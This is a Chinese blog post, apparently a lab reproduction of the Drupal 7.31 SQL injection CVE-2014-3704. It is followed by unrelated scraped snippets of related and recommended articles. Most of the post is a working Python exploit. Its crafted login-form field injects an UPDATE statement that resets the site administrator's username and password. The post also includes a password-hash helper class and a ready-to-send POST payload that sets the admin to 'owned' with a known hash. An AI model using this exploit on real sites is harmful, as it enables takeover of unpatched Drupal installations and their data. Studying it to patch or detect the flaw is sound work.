记录下自己的复现思路

漏洞影响:

Drupal 7.31

Drupal是一个开源内容管理平台,为数百万个网站和应用程序提供支持。

0x01漏洞复现

复现环境:

1) Apache2.4

2) Php 7.0

3) drupal 7.31 https://www.drupal.org/drupal-7.31-release-notes(点击下载)

环境打包在目录下安装即可

中间遇到的问题:

解决方法:关闭extersion=php_mbstring.dll(修改前注意备份原来的)

Exploit:

  

原先管理员帐号:root 密码:rootxxxx

import urllib2,sys

from drupalpass import DrupalHash

host = sys.argv[1]

user = sys.argv[2]

password = sys.argv[3]

if len(sys.argv) != 3:

    print "host username password"

    print "http://nope.io admin wowsecure"

hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()

target = '%s/?q=node&destination=node' % host

post_data = "name[0%20;update+users+set+name%3d\'" \

            +user \

            +"'+,+pass+%3d+'" \

            +hash[:55] \

            +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"

content = urllib2.urlopen(url=target, data=post_data).read()

if "mb_strlen() expects parameter 1" in content:

        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

import hashlib

# Calculate a non-truncated Drupal 7 compatible password hash.

# The consumer of these hashes must truncate correctly.

class DrupalHash:

  def __init__(self, stored_hash, password):

    self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

    self.last_hash = self.rehash(stored_hash, password)

  def get_hash(self):

    return self.last_hash

  def password_get_count_log2(self, setting):

    return self.itoa64.index(setting[3])

  def password_crypt(self, algo, password, setting):

    setting = setting[0:12]

    if setting[0] != '$' or setting[2] != '$':

      return False

    count_log2 = self.password_get_count_log2(setting)

    salt = setting[4:12]

    if len(salt) < 8:

      return False

    count = 1 << count_log2

    if algo == 'md5':

      hash_func = hashlib.md5

    elif algo == 'sha512':

      hash_func = hashlib.sha512

    else:

      return False

    hash_str = hash_func(salt + password).digest()

    for c in range(count):

      hash_str = hash_func(hash_str + password).digest()

    output = setting + self.custom64(hash_str)

    return output

  def custom64(self, string, count = 0):

    if count == 0:

      count = len(string)

    output = ''

    i = 0

    itoa64 = self.itoa64

    while 1:

      value = ord(string[i])

      i += 1

      output += itoa64[value & 0x3f]

      if i < count:

        value |= ord(string[i]) << 8

      output += itoa64[(value >> 6) & 0x3f]

      if i >= count:

        break

      i += 1

      if i < count:

        value |= ord(string[i]) << 16

      output += itoa64[(value >> 12) & 0x3f]

      if i >= count:

        break

      i += 1

      output += itoa64[(value >> 18) & 0x3f]

      if i >= count:

        break

    return output

  def rehash(self, stored_hash, password):

    # Drupal 6 compatibility

    if len(stored_hash) == 32 and stored_hash.find('$') == -1:

      return hashlib.md5(password).hexdigest()

      # Drupal 7

    if stored_hash[0:2] == 'U$':

      stored_hash = stored_hash[1:]

      password = hashlib.md5(password).hexdigest()

    hash_type = stored_hash[0:3]

    if hash_type == '$S$':

      hash_str = self.password_crypt('sha512', password, stored_hash)

    elif hash_type == '$H$' or hash_type == '$P$':

      hash_str = self.password_crypt('md5', password, stored_hash)

    else:

      hash_str = False

    return hash_str

我这里编译不成功,打算换一种方法

http://127.0.0.1/drupal-7.31/node?destination=node

点击 login  这里post修改查询语句,插入update的sql语句直接更改管理员帐号密码。

这里的加密方式调用官方的password-hash.sh 去生成自己的hash

这里报错了。

找了两个网上的公开的hash去update 。

$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld   ---->thanks

$S$CTo9G7Lx2mJrSyWmlh3NRTXL6AWJt35fzep9obyjkwezMHOgQf.s    --->P@55w0rd.

Payload:

name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$CTo9G7Lx2mJrSyWmlh3NRTXL6AWJt35fzep9obyjkwezMHOgQf.s'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

  

直接update用户:owned 密码:P@55w0rd

从数据库查询回来的结果或者mysql的监控可以看到,管理员的用户名和密码都被重置。owned用户提升为管理员,并且密码设为P@55w0rd。

ref:

  • http://0day5.com/archives/2310/
  • http://www.freebuf.com/vuls/47690.html

[CVE-2014-3704]Drupal 7.31 SQL注入漏洞分析与复现的更多相关文章

  1. Drupal 7.31 SQL注入漏洞利用具体解释及EXP

     有意迟几天放出来这篇文章以及程序,只是看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,只是说实话这个洞威力挺大的.当然.这也是Drupal本身没有意料到的. 0x00 首 ...

  2. PHPCMS \phpcms\modules\member\index.php 用户登陆SQL注入漏洞分析

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: POC http://localhost/p ...

  3. Beescms_v4.0 sql注入漏洞分析

    Beescms_v4.0 sql注入漏洞分析 一.漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入. 二.漏洞环境搭建 1.官方下载 ...

  4. ThinkCMF X2.2.2多处SQL注入漏洞分析

       1.     漏洞描述 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,其中X系列基于ThinkPHP 3.2.3开发,最后更新到2.2.2版本.最近刚好在渗透测试 ...

  5. DM企业建站系统v201710 sql注入漏洞分析 | 新版v201712依旧存在sql注入

    0x00 前言 本来呢,这套CMS都不想审的了.下载下来打开一看,各种debug注释,排版烂的不行. 贴几个页面看看 感觉像是新手练手的,没有审下去的欲望了. 但想了想,我tm就是新手啊,然后就继续看 ...

  6. Vtiger CRM 几处SQL注入漏洞分析,测试工程师可借鉴

    本文由云+社区发表 0x00 前言 干白盒审计有小半年了,大部分是业务上的代码,逻辑的复杂度和功能模块结构都比较简单,干久了收获也就一般,有机会接触一个成熟的产品(vtiger CRM)进行白盒审计, ...

  7. 【代码审计】五指CMS_v4.1.0 copyfrom.php 页面存在SQL注入漏洞分析

      0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhi ...

  8. 【代码审计】五指CMS_v4.1.0 后台存在SQL注入漏洞分析

      0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhi ...

  9. 【代码审计】大米CMS_V5.5.3 SQL注入漏洞分析

      0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...

随机推荐

  1. Ubuntu16.04 下docker部署web项目

    概念性的请戳 第一步:更新apt-get update 第二步:安装环境 apt-get install \ apt-transport-https \ ca-certificates \ curl ...

  2. anaconda的所有版本大全--下载地址

    地址: https://repo.continuum.io/archive/ 内容: Anaconda installer archive Filename Size Last Modified MD ...

  3. datatable的使用

    学习可参考:http://www.guoxk.com/node/jquery-datatables http://yuemeiqing2008-163-com.iteye.com/blog/20069 ...

  4. erlang防止反编译

    前面提到了erlang的反编译,下面说下防止反编译: 1)建立~/.erlang.crypt 在编译的用户名的home目录中建立一个加密方法的文件.erlang.crypt,内容如下: [{debug ...

  5. DotNetBar MessageBoxEx 显示中文 显示office2007风格

    MessageBoxEx显示消息的时候按钮是中文的解决这个问题设置 MessageBoxEx的UseSystemLocalizedString属性为 true. MessageBoxEx.UseSys ...

  6. mongodb学习之:数据库命令以及固定集合

    如何我们要删除一个集合,可以采用db.test.drop()的方式,其实在这背后,这个函数运行的是drop命令.可以用runCommand达到同样的效果. 我们首先新建一个集合作为测试使用: > ...

  7. Dockder的CS模式:

    Docker的守护进程一直运行, yw1989@ubuntu:~$ ps -ef | grep docker : 就是docxker的守护进程 root : ? :: /usr/bin/dockerd ...

  8. ImageIO 操作图片

    /** * 读取本地图片到另一个本地文件夹 * @throws IOException */ public void copeImageToOtherFolder() throws IOExcepti ...

  9. 基于BASYS2的VHDL程序——数字钟(改进版)

    扩展到时分秒.加了入调时电路,但不知道为什么有两个按键不好使.而且不知道以何种方式假如按键消抖电路,因为加入后会多个时钟控制一个信号,物理不可实现.调试电路待解决.还有,四个数目管中间的那两个圆点怎么 ...

  10. TCP与HTTP连接管理

    一. HTTP事务时延原因(HTTP权威指南 P86) 1.客户端首先需要根据URI确定WEB服务器的IP和端口号, 那么DNS解析上花的时间会很多(大多数HTTP客户端会有一个小的DNS缓存)   ...